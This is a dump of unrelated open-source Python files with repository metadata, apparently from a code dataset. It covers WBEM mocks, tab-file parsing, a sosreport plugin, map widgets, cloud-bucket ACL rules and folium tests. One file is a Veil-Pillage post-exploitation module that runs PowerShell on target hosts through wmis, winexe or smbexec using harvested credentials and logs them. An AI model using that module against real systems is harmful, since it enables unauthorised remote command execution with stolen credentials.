# get classname and validate. This provider uses only one class
classname = localobject.classname
assert classname.lower() ==
|
self.provider_classnames.lower()
if methodname != 'AllTypesMethod':
raise pywbem.CIMError(pywbem.CIM_ERR_METHOD_NOT_AVAILABLE)
# Test if class exists.
if not self.class
|
_exists(namespace, classname):
raise pywbem.CIMError(
pywbem.CIM_ERR_NOT_FOUND,
"class {0} does not exist in CIM repository, "
"namespace {1}".format(classname, namespace))
# Return the input parameters as output parameters
out_params = params
return_value = 0
return (return_value, out_params)
# Register the provider to the mock environment
# pylint: disable=undefined-variable
_PROV = CIM_AllTypesMethodProvider(CONN.cimrepository) # noqa: F821
CONN.register_provider(_PROV, CONN.default_namespace, # noqa: F821
verbose=VERBOSE) # noqa: F821
|
Exploit-install/Veil-Pillage
|
modules/enumeration/host/detect_powershell.py
|
Python
|
gpl-3.0
| 2,043
| 0.007832
|
"""
Module to detect a functional Powershell installation on a host or host list.
TODO: implement parts of https://github.com/DiabloHorn/DiabloHorn/blob/master/remote_appinitdlls/rapini.py
for remote registry modifications?
Module built by @harmj0y
"""
from lib import command_methods
class Module:
def __init__(self, targets=None, creds=None, args=None):
self.name = "Powershell Detection"
self.description = "Detects a functional Powershell installation on a host or host list."
# internal list() that holds one or more targets
self.targets = targets
# internal list() that holds one or more cred tuples
# [ (username, pw), (username2, pw2), ...]
self.creds = creds
# a state output file that will be written out by pillage.py
# ex- if you're querying domain users
self.output = ""
# user interaction for- format is {Option : [Value, Description]]}
self.required_options = {"trigger_method" : ["wmis", "[wmis], [winexe], or [smbexec] for triggering"]}
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
for target in self.targets:
# reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
# but we don't actually care usually if it's installed, just if it's functionality
# so let's just invoke it yo'
command = "powershell.exe -c \"$a=42;$a\""
result = command_methods.executeResult(target, username, password, com
|
mand, triggerMethod)
if result.strip() == "42":
self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
else:
self.output += "[!] Powershell not detected as functional using creds '"+usern
|
ame+":"+password+"' on : " + target + "\n"
|
maximilianh/maxtools
|
lib/tabfile.py
|
Python
|
gpl-2.0
| 15,316
| 0.012471
|
import sys
import glob
#import sets
import re
def openSpec(fname, mode="r"):
""" open and return filehandle, open stdin if fname=="stdin", do nothing if none """
if fname=="stdin":
return sys.stdin
elif fname=="stdout":
return sys.stdout
elif fname=="none" or fname==None:
return None
else:
return open(fname, mode)
def writeList(fname, list):
of = openSpec(fname, "w")
for row in list:
row = [str(d) for d in row]
of.write("\t".join(row))
of.write("\n")
of.close()
def slurpdict(fname, comments=False, valField=1, doNotCheckLen=False, asFloat=False, otherFields=False, asInt=False, headers=False, keyAsInt=False, quiet=False):
""" parse file with key -> value pair on each line, key/value has 1:1 relationship"""
""" last field: set valField==-1, return as a dictionary key -> value """
if fname==None or fname=="":
return {}
dict = {}
f = openSpec(fname)
if not f:
return dict
if headers:
headers = f.readline()
for l in f:
fs = l.strip().split("\t")
if comments and l.startswith("#"):
continue
if not len(fs)>1:
if not doNotCheckLen:
if not quiet:
sys.stderr.write("info: not enough fields, ignoring line %s\n" % l)
continue
else:
key = fs[0]
val = None
else:
key = fs[0]
if keyAsInt:
key = int(key)
if not otherFields:
val = fs[valField]
else:
val = fs[1:]
if asFloat:
val = float(val)
elif asInt:
val = int(val)
if key not in dict:
dict[key] = val
else:
if not quiet:
sys.stderr.write("info: file %s, hit key %s two times: %s -> %s\n" %(fname, key, key, val))
return dict
def slurpdictlist(fname, reverse=False, filterComments=False, keyType=None, valType=None):
""" parse file with key -> value pair on each line and return as dict -> list (1:n relationship) """
if fname==None:
return {}
dict = {}
if fname=="stdin":
fh = sys.stdin
else:
fh = open(fname, "r")
for l in fh:
if filterComments and l.startswith("#"):
continue
fs = l.strip().split("\t")
if len(fs)>1:
# reverse?
if reverse:
val = fs[0]
key = fs[1]
else:
key = fs[0]
val = fs[1]
# convert to specified types
if keyType:
key = keyType(key)
if valType:
val = valType(val)
dict.setdefault(key, []).append(val)
return dict
def slurpdictset(fname, reverse=False, keyType=None, valType=None):
""" parse file with key -> value pair on each line and return as dict -> list (1:n relationship). Keytype can be e.g. types.IntType """
if fname==None or fname=="":
return {}
dict = {}
if fname=="stdin":
fh = sys.stdin
else:
fh = open(fname, "r")
for l in fh:
fs = l.strip().split("\t")
if len(fs)>1:
if not reverse:
key = fs[0]
val = fs[1]
else:
val = fs[0]
key = fs[1]
# convert to specified types
if keyType:
key = keyType(key)
if valType:
val = valType(val)
# add to set
dict.setdefault(key, set()).add(val)
return dict
def slurplist(fname, check=True, field=None, filterComments=False, valType=None, headers=False):
""" parse a file with one string per line and return as list"""
if fname==None:
return []
if fname=="stdin":
fh = sys.stdin
else:
fh = open(fname, "r")
list = []
if headers:
fh.readline()
for l in fh:
l = l.strip()
if filterComments and l.startswith("#"):
continue
if len(l)==0:
continue
if check and l in list:
sys.stderr.write("tabfile.py/slurplist: file=%s, duplicate key = %s, exiting\n" % (fname, l))
sys.exit(1)
if field==None:
value = l
else:
value = l.split()[field]
if valType:
value = valType(value)
list.append(value)
return list
def slurplistasdict(fname, split=False, default=True):
""" parse a file with one string per line and return as dict for faster access"""
dict = {}
for l in open(fname, "r"):
l = l.strip()
if split:
l = l.split("\t")[0]
if l in dict:
sys.stderr.write("tabfile.py: key already in dict!\n")
return None
dict[l.strip()] = default
return dict
def slurpdictlistlist(fname):
""" parse file with key -> values pair on each line, many values per line, values are returned as list"""
if fname==None:
return []
dict = {}
for l in open(fname, "r"):
if l.startswith("#"):
continue
fs = l.strip().split("\t")
if len(fs)>1:
key = fs[0]
vals = fs[1:]
dict.setdefault(key, []).append(vals)
return dict
def parseTsv(fname, columnNames = None, asListOfDicts=False):
""" retrieve only selected fields from tsv files with headers (-> like R dataframes) as a list of lists or list of dicts"""
""" returns a tuple (comments, headers, data) """
comments, headers, data = [], [], []
f = openSpec(fname)
# parse comments and headers
firstLine = f.readline().strip()
#while firstLine.startswith("#"):
#comments.append(firstLine)
#firstLine = f.readline().strip()
headers = firstLine.split(
|
"\t")
if columnNames==None or len(columnNames)==0:
columnNames=headers
for c in columnNames:
if c not in headers:
sys.stderr.write("error tabfile.py: columnName %s (out of %s) not found in headers %s\n" % (c,str(columnNames), str(headers)))
sys.exit(1)
noList = range(0, len(
|
headers))
headerToNum = dict(zip(headers,noList))
data = []
#lno=0
for l in f:
if l.startswith("#"):
continue
#lno+=1
#if lno==1: # ignore headers
#continue
fs = l.strip().split("\t")
if asListOfDicts:
rec = {}
else:
rec = []
for c in columnNames:
if asListOfDicts:
rec[c]=fs[headerToNum[c]]
else:
rec.append(fs[headerToNum[c]])
data.append(rec)
return comments, headers, data
############### PSL FILES ########################
class Psl:
def toList(self, str):
return [int(x) for x in str.split(",") if x.strip()!=""]
def __init__(self, line):
(match, misMatches, repMatches, nCount, qNumInsert, qBaseInsert, tNumInsert, tBaseInsert, strand, qName, qSize, qStart, qEnd, tName, tSize, tStart, tEnd, blockCount, blockSizes, qStarts, tStarts) = line.split("\t")
self.match = int(match)
self.misMatches = int(misMatches)
self.repMatches = int(repMatches)
self.nCount = int(nCount)
self.qNumInsert = int(qNumInsert)
self.qBaseInsert = int(qBaseInsert)
self.tNumInsert = int(tNumInsert)
self.tBaseInsert = int(tBaseInsert)
self.strand = strand
self.qName = qName
self.qSize = int(qSize)
self.qStart = int(qStart)
self.qEnd = int(qEnd)
self.tName = tName
self.tSize = int(tSize)
self.tStart = int(tStart)
self.tEnd = int(tEnd)
self.blockCount = int(blockCount)
self.blockSizes = self.toList(blockSizes)
self.qStarts = self.toList(qStarts)
self.tStarts = self.toList(tStarts)
def getQueryBlocks(self):
regions = []
if self.strand[0]=="+":
|
pierg75/pier-sosreport
|
sos/plugins/tomcat.py
|
Python
|
gpl-2.0
| 2,298
| 0
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from sos.plugins import Plugin, RedHatPlugin
from datetime import datetime
class Tomcat(Plugin, RedHatPlugin):
"""Apache Tomcat server
"""
plugin_name = 'tomcat'
profiles = ('webserver', 'java', 'services', 'sysmgmt')
packages = ('tomcat', 'tomcat6', 'tomcat7', 'tomcat8')
def setup(self):
self.add_copy_spec([
"/etc/tomcat",
"/etc/tomcat6",
"/etc/tomcat7",
"/etc/tomcat8"
])
limit = self.get_option("log_size")
if not self.get_option("all_logs"):
log_glob = "/var/log/tomcat*/catalina.out"
self.add_copy_spec(log_glob, sizelimit=limit)
# get today's date in iso format so that days/months below 10
# prepend 0
today = datetime.date(datetime.now()).isoformat()
log_glob = "/var/log/tomcat*/catalina.%s.log" % today
self.add_copy_spec(log_glob, sizelimit=limit)
else:
self.add_copy_spec("/var/log/tomc
|
at*/*")
def postproc(self):
serverXmlPasswordAttributes = ['keyPass', 'keystorePass',
'truststorePass', 'SS
|
LPassword']
for attr in serverXmlPasswordAttributes:
self.do_path_regex_sub(
r"\/etc\/tomcat.*\/server.xml",
r"%s=(\S*)" % attr,
r'%s="********"' % attr
)
self.do_path_regex_sub(
r"\/etc\/tomcat.*\/tomcat-users.xml",
r"password=(\S*)",
r'password="********"'
)
# vim: set et ts=4 sw=4 :
|
AxisPhilly/py-li
|
li/exceptions.py
|
Python
|
mit
| 302
| 0
|
class LIException(Exception):
"""There was an ambiguous exception that o
|
ccurred while handling your
request."""
class DocTypeException(LIException):
"""The provided document type is invalid.
"""
cla
|
ss DocIDException(LIException):
"""The provided document ID is invalid.
"""
|
aljim/deploymentmanager-samples
|
examples/v2/saltstack/python/minion.py
|
Python
|
apache-2.0
| 3,271
| 0.003057
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a set of VMs each running a Salt minion daemon in a Docker container.
"""
IMAGE = ('https://www.googleapis.com/compute/v1/projects/debian-cloud'
'/global/images/family/debian-9')
def GenerateConfig(context):
"""Generate final configuration."""
resources = []
for replica in range(0, context.
|
properties['minionCount']):
resources.append(GenerateInstanceConfig(context, replica))
return {'resources': resources}
def Gen
|
erateInstanceConfig(context, replica):
"""Generate configuration for every minion instance."""
name = (context.env['deployment'] + '-' + context.env['name'] + '-'
+ str(replica))
machine_type = ('https://www.googleapis.com/compute/v1/projects/'
+ context.env['project'] + '/zones/'
+ context.properties['zone'] + '/machineTypes/f1-micro')
instance = {
'type': 'compute.v1.instance',
'name': name,
'properties': {
'zone': context.properties['zone'],
'machineType': machine_type,
'disks': [{
'deviceName': 'boot',
'type': 'PERSISTENT',
'boot': True,
'autoDelete': True,
'initializeParams': {
'sourceImage': IMAGE
}
}],
'networkInterfaces': [{
'network': ('https://www.googleapis.com/compute/v1/projects/'
+ context.env['project']
+ '/global/networks/default'),
'accessConfigs': [{
'name': 'External NAT',
'type': 'ONE_TO_ONE_NAT'
}]
}],
'tags': {
'items': ['http-server']
},
'metadata': {
'items': [{
'key': 'startup-script',
'value': ('#! /bin/bash\n'
'sudo echo \'deb http://debian.saltstack.com'
'/debian jessie-saltstack main\' >> '
'/etc/apt/sources.list\n'
'sudo wget -q -O- http://debian.saltstack.com/'
'debian-salt-team-joehealy.gpg.key | '
'sudo apt-key add -\n'
'sudo apt-get update\n'
'sudo apt-get -y install salt-minion\n'
'sudo sed -i \'s/#master: salt/master: ' +
context.properties['master'] +
'/\' /etc/salt/minion\n'
'sudo salt-minion -l debug')
}]
}
}
}
return instance
|
agconti/njode
|
env/lib/python2.7/site-packages/floppyforms/gis/widgets.py
|
Python
|
bsd-3-clause
| 5,019
| 0
|
from django.conf import settings
from django.utils import translation, six
try:
from django.contrib.gis import gdal, geos
except ImportError:
"""GDAL / GEOS not installed"""
import floppyforms as forms
__all__ = ('GeometryWidget', 'GeometryCollectionWidget',
'PointWidget', 'MultiPointWidget',
'LineStringWidget', 'MultiLineStringWidget',
'PolygonWidget', 'MultiPolygonWidget',
'BaseGeometryWidget', 'BaseMetacartaWidget',
'BaseOsmWidget', 'BaseGMapWidget')
class BaseGeometryWidget(forms.Textarea):
"""
The base class for rich geometry widgets. Custom widgets may be
obtained by subclassing this base widget.
"""
display_wkt = False
map_width = 600
map_height = 400
map_srid = 4326
template_name = 'floppyforms/gis/openlayers.html'
# Internal API #
is_point = False
is_linestring = False
is_polygon = False
is_collection = False
geom_type = 'GEOMETRY'
map_attrs = ('map_width', 'map_height', 'map_srid', 'display_wkt')
def __init__(self, *args, **kwargs):
super(BaseGeometryWidget, self).__init__(*args, **kwargs)
attrs = kwargs.pop('attrs', {})
for key in self.map_attrs:
setattr(self, key, attrs.pop(key, getattr(self, key)))
def get_context_data(self):
ctx = super(BaseGeometryWidget, self).get_context_data()
for key in ('is_polygon', 'is_linestring',
'is_point', 'is_collection'):
ctx[key] = getattr(self, key)
ctx['geom_type'] = gdal.OGRGeomType(self.geom_type)
for key in self.map_attrs:
ctx[key] = getattr(self, key)
if self.geom_type == 'GEOMETRYCOLLECTION':
ctx['geom_type'] = 'Collection'
return ctx
def get_context(self, name, value, attrs=None, extra_context={}):
# If a string reaches here (via a validation error on another
# field) then just reconstruct the Geometry.
if isinstance(value, six.text_type):
try:
value = geos.GEOSGeometry(value)
except (geos.GEOSException, ValueError):
value = None
if (
value and value.geom_type.upper() != self.geom_type and
self.geom_type != 'GEOMETRY'
):
value = None
# Defaulting the WKT value to a blank string
wkt = ''
if value:
srid = self.map_srid
if value.srid != srid:
try:
ogr = value.ogr
ogr.transform(srid)
wkt = ogr.wkt
except gdal.OGRException:
pass # wkt left as an empty string
else:
wkt = value.wkt
context = super(BaseGeometryWidget, self).get_context(name, wkt, attrs)
context['module'] = 'map_%s' % name.replace('-', '_')
context['name'] = name
# Django >= 1.4 doesn't have ADMIN_MEDIA_PREFIX anymore, we must
# rely on contrib.staticfiles.
if hasattr(settings, 'ADMIN_MEDIA_PREFIX'):
context['ADMIN_MEDIA_PREFIX'] = settings.ADMIN_MEDIA_PREFIX
else:
context['ADMIN_MEDIA_PREFIX'] = settings.STATIC_URL + 'admin/'
context['LANGUAGE_BIDI'] = translation.get_language_bidi()
return context
class GeometryWidget(BaseGeometryWidget):
pass
class GeometryCollectionWidget(GeometryWidget):
is_collection = True
|
geom_type = 'GEOMETRYCOLLECTION'
class PointWidget(BaseGeometryWidget):
is_point = True
geom_type = 'POINT'
class MultiPoint
|
Widget(PointWidget):
is_collection = True
geom_type = 'MULTIPOINT'
class LineStringWidget(BaseGeometryWidget):
is_linestring = True
geom_type = 'LINESTRING'
class MultiLineStringWidget(LineStringWidget):
is_collection = True
geom_type = 'MULTILINESTRING'
class PolygonWidget(BaseGeometryWidget):
is_polygon = True
geom_type = 'POLYGON'
class MultiPolygonWidget(PolygonWidget):
is_collection = True
geom_type = 'MULTIPOLYGON'
class BaseMetacartaWidget(BaseGeometryWidget):
class Media:
js = (
'http://openlayers.org/api/OpenLayers.js',
'floppyforms/js/MapWidget.js',
)
class BaseOsmWidget(BaseGeometryWidget):
"""An OpenStreetMap base widget"""
map_srid = 900913
template_name = 'floppyforms/gis/osm.html'
class Media:
js = (
'http://openlayers.org/api/OpenLayers.js',
'http://www.openstreetmap.org/openlayers/OpenStreetMap.js',
'floppyforms/js/MapWidget.js',
)
class BaseGMapWidget(BaseGeometryWidget):
"""A Google Maps base widget"""
map_srid = 900913
template_name = 'floppyforms/gis/google.html'
class Media:
js = (
'http://openlayers.org/api/OpenLayers.js',
'floppyforms/js/MapWidget.js',
'http://maps.google.com/maps/api/js?sensor=false',
)
|
tastyproject/tasty
|
tasty/tests/functional/protocols/mul/unsignedvec_server_server_client/protocol.py
|
Python
|
gpl-3.0
| 442
| 0.004525
|
# -*- coding: utf-8 -*-
__params__ = {'la': 32, 'lb': 32, 'da': 10
|
}
def protocol(client, server, params):
la = params['la']
lb = params['lb']
da = params["da"]
server.a = UnsignedVec(bitlen=la, dim=da).input(src=driver, desc="a")
server.b = Unsi
|
gned(bitlen=lb).input(src=driver, desc="b")
client.a <<= server.a
client.b <<= server.b
client.c = client.a * client.b
client.c.output(dest=driver, desc="c")
|
felixbb/forseti-security
|
google/cloud/security/scanner/audit/buckets_rules_engine.py
|
Python
|
apache-2.0
| 8,802
| 0.000227
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules engine for Bucket acls"""
from collections import namedtuple
import itertools
import re
# pylint: disable=line-too-long
from google.cloud.security.common.gcp_type import bucket_access_controls as bkt_acls
# pylint: enable=line-too-long
from google.cloud.security.common.util import log_util
from google.cloud.security.scanner.audit import base_rules_engine as bre
from google.cloud.security.scanner.audit import errors as audit_errors
LOGGER = log_util.get_logger(__name__)
# TODO: move this to utils since it's used in more that one engine
def escape_and_globify(pattern_string):
"""Given a pattern string with a glob, create actual regex pattern.
To require > 0 length glob, change the "*" to ".+". This is to handle
strings like "*@company.com". (THe actual regex would probably be
".*@company.com", except that we don't want to match zero-length
usernames before the "@".)
Args:
pattern_string: The pattern string of which to make a regex.
Returns:
The pattern string, escaped except for the "*", which is
transformed into ".+" (match on one or more characters).
"""
return '^{}$'.format(re.escape(pattern_string).replace('\\*', '.+'))
class BucketsRulesEngine(bre.BaseRulesEngine):
"""Rules engine for bucket acls"""
def __init__(self, rules_file_path):
"""Initialize.
Args:
rules_file_path: file location of rules
"""
super(BucketsRulesEngine,
self).__init__(ru
|
les_file_path=rules_file_path)
self.rule_bo
|
ok = None
def build_rule_book(self):
"""Build BucketsRuleBook from the rules definition file."""
self.rule_book = BucketsRuleBook(self._load_rule_definitions())
# pylint: disable=arguments-differ
def find_policy_violations(self, buckets_acls,
force_rebuild=False):
"""Determine whether bucket acls violates rules."""
violations = itertools.chain()
if self.rule_book is None or force_rebuild:
self.build_rule_book()
resource_rules = self.rule_book.get_resource_rules()
for rule in resource_rules:
violations = itertools.chain(violations,
rule.\
find_policy_violations(buckets_acls))
return violations
def add_rules(self, rules):
"""Add rules to the rule book."""
if self.rule_book is not None:
self.rule_book.add_rules(rules)
class BucketsRuleBook(bre.BaseRuleBook):
"""The RuleBook for bucket acls resources."""
def __init__(self, rule_defs=None):
"""Initialization.
Args:
rule_defs: rule definitons
"""
super(BucketsRuleBook, self).__init__()
self.resource_rules_map = {}
if not rule_defs:
self.rule_defs = {}
else:
self.rule_defs = rule_defs
self.add_rules(rule_defs)
def add_rules(self, rule_defs):
"""Add rules to the rule book"""
for (i, rule) in enumerate(rule_defs.get('rules', [])):
self.add_rule(rule, i)
def add_rule(self, rule_def, rule_index):
"""Add a rule to the rule book.
Args:
rule_def: A dictionary containing rule definition properties.
rule_index: The index of the rule from the rule definitions.
Assigned automatically when the rule book is built.
Raises:
"""
resources = rule_def.get('resource')
for resource in resources:
resource_ids = resource.get('resource_ids')
if not resource_ids or len(resource_ids) < 1:
raise audit_errors.InvalidRulesSchemaError(
'Missing resource ids in rule {}'.format(rule_index))
bucket = rule_def.get('bucket')
entity = rule_def.get('entity')
email = rule_def.get('email')
domain = rule_def.get('domain')
role = rule_def.get('role')
if (bucket is None) or (entity is None) or (email is None) or\
(domain is None) or (role is None):
raise audit_errors.InvalidRulesSchemaError(
'Faulty rule {}'.format(rule_def.get('name')))
rule_def_resource = bkt_acls.BucketAccessControls(
escape_and_globify(bucket),
escape_and_globify(entity),
escape_and_globify(email),
escape_and_globify(domain),
escape_and_globify(role.upper()))
rule = Rule(rule_name=rule_def.get('name'),
rule_index=rule_index,
rules=rule_def_resource)
resource_rules = self.resource_rules_map.get(rule_index)
if not resource_rules:
self.resource_rules_map[rule_index] = rule
def get_resource_rules(self):
"""Get all the resource rules for (resource, RuleAppliesTo.*).
Args:
resource: The resource to find in the ResourceRules map.
Returns:
A list of ResourceRules.
"""
resource_rules = []
for resource_rule in self.resource_rules_map:
resource_rules.append(self.resource_rules_map[resource_rule])
return resource_rules
class Rule(object):
"""Rule properties from the rule definition file.
Also finds violations.
"""
def __init__(self, rule_name, rule_index, rules):
"""Initialize.
Args:
rule_name: Name of the loaded rule
rule_index: The index of the rule from the rule definitions
rules: The rules from the file
"""
self.rule_name = rule_name
self.rule_index = rule_index
self.rules = rules
def find_policy_violations(self, bucket_acl):
"""Find bucket policy acl violations in the rule book.
Args:
bucket_acl: Bucket ACL resource
Returns:
Returns RuleViolation named tuple
"""
if self.rules.bucket != '^.+$':
bucket_bool = re.match(self.rules.bucket, bucket_acl.bucket)
else:
bucket_bool = True
if self.rules.entity != '^.+$':
entity_bool = re.match(self.rules.entity, bucket_acl.entity)
else:
entity_bool = True
if self.rules.email != '^.+$':
email_bool = re.match(self.rules.email, bucket_acl.email)
else:
email_bool = True
if self.rules.domain != '^.+$':
domain_bool = re.match(self.rules.domain, bucket_acl.domain)
else:
domain_bool = True
if self.rules.role != '^.+$':
role_bool = re.match(self.rules.role, bucket_acl.role)
else:
role_bool = True
should_raise_violation = (
(bucket_bool is not None and bucket_bool) and
(entity_bool is not None and entity_bool) and
(email_bool is not None and email_bool) and
(domain_bool is not None and domain_bool) and
(role_bool is not None and role_bool))
if should_raise_violation:
yield self.RuleViolation(
resource_type='project',
resource_id=bucket_acl.project_number,
rule_name=self.rule_name,
rule_index=self.rule_index,
violation_type='BUCKET_VIOLATION',
role=bucket_acl.role,
entity=bucket_acl.entity,
email=bucket_acl.em
|
talespaiva/folium
|
tests/test_features.py
|
Python
|
mit
| 3,684
| 0.000272
|
# -*- coding: utf-8 -*-
""""
Folium Features Tests
---------------------
"""
import os
from branca.six import text_type
from branca.element import Element
from folium import Map, Popup
from folium import features
tmpl = """
<!DOCTYPE html>
<head>
<meta
|
http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
</body>
<script>
</script>
""" # noqa
# Figure
def test_figure_creation():
f = features.Figure()
assert isinstance(f, Element)
bounds = f.get_bounds()
assert bounds == [[None, None], [None, None]], bounds
def test_figure_rendering():
|
f = features.Figure()
out = f.render()
assert type(out) is text_type
bounds = f.get_bounds()
assert bounds == [[None, None], [None, None]], bounds
def test_figure_html():
f = features.Figure()
out = f.render()
out = os.linesep.join([s.strip() for s in out.splitlines() if s.strip()])
print(out)
assert out.strip() == tmpl.strip(), '\n'+out.strip()+'\n'+'-'*80+'\n'+tmpl.strip()
bounds = f.get_bounds()
assert bounds == [[None, None], [None, None]], bounds
def test_figure_double_rendering():
f = features.Figure()
out = f.render()
out2 = f.render()
assert out == out2
bounds = f.get_bounds()
assert bounds == [[None, None], [None, None]], bounds
def test_marker_popups():
m = Map()
features.Marker([45, -180], popup='-180').add_to(m)
features.Marker([45, -120], popup=Popup('-120')).add_to(m)
features.RegularPolygonMarker([45, -60], popup='-60').add_to(m)
features.RegularPolygonMarker([45, 0], popup=Popup('0')).add_to(m)
features.CircleMarker([45, 60], popup='60').add_to(m)
features.CircleMarker([45, 120], popup=Popup('120')).add_to(m)
m._repr_html_()
bounds = m.get_bounds()
assert bounds == [[45, -180], [45, 120]], bounds
def test_polyline_popups():
m = Map([43, -100], zoom_start=4)
features.PolyLine([[40, -80], [45, -80]], popup="PolyLine").add_to(m)
features.PolyLine([[40, -90], [45, -90]],
popup=Popup("PolyLine")).add_to(m)
features.MultiPolyLine([[[40, -110], [45, -110]]],
popup="MultiPolyLine").add_to(m)
features.MultiPolyLine([[[40, -120], [45, -120]]],
popup=Popup("MultiPolyLine")).add_to(m)
m._repr_html_()
bounds = m.get_bounds()
assert bounds == [[40, -120], [45, -80]], bounds
# DivIcon.
def test_divicon():
html = """<svg height="100" width="100">
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
</svg>""" # noqa
div = features.DivIcon(html=html)
assert isinstance(div, Element)
assert div.className == 'empty'
assert div.html == html
# WmsTileLayer.
def test_wms_service():
m = Map([40, -100], zoom_start=4)
url = 'http://mesonet.agron.iastate.edu/cgi-bin/wms/nexrad/n0r.cgi'
w = features.WmsTileLayer(url,
name='test',
format='image/png',
layers='nexrad-n0r-900913',
attr=u"Weather data © 2012 IEM Nexrad",
transparent=True)
w.add_to(m)
m._repr_html_()
bounds = m.get_bounds()
assert bounds == [[None, None], [None, None]], bounds
# ColorLine.
def test_color_line():
m = Map([22.5, 22.5], zoom_start=3)
color_line = features.ColorLine(
[[0, 0], [0, 45], [45, 45], [45, 0], [0, 0]],
[0, 1, 2, 3],
colormap=['b', 'g', 'y', 'r'],
nb_steps=4,
weight=10,
opacity=1)
m.add_child(color_line)
m._repr_html_()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.